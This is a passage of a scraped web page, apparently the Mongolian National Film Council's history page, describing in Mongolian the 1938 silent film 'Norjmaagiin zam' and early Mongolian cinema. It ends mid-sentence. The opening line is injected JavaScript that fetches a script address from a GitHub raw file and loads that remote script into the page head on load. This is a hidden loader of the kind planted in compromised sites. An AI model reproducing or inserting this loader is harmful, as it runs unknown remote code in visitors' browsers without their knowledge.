;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Түүх - Mongolian National Film Council
Монголын кино урлагийн “эхэн үе”

“Норжмаагийн зам” 1938 онд найруулагч Т.Нацагдорж өөрийнхөө зохиолоор “Норжмаагийн зам” хэмээх 2 бүлэг, хар цагаан, дуугүй киног хийсэн нь манай уран бүтээлчдийн бие даан бүтээсэн анхны уран сайхны кино байв. Энэ киноноос Норжмаа хуучныг орхиж, шинийг эрэлхийлэн явахдаа харанхуйгаас гэгээнд, хоцрогдлоос соёлд дэвшсэн үйл явцыг харж болно. “Норжмаагийн зам” кино нь уран сайхны киноны бүрэн гүйцэд төрхийг хараахан олж чадаагүй, киноны зохиол болон найруулгын арга барил нь эсрэг тэсрэг үзэлд тулгуурласан тоглолттой, ухуулгын киноны эхлэл болсон ч агуулга, уран сайхны боловсруулалтын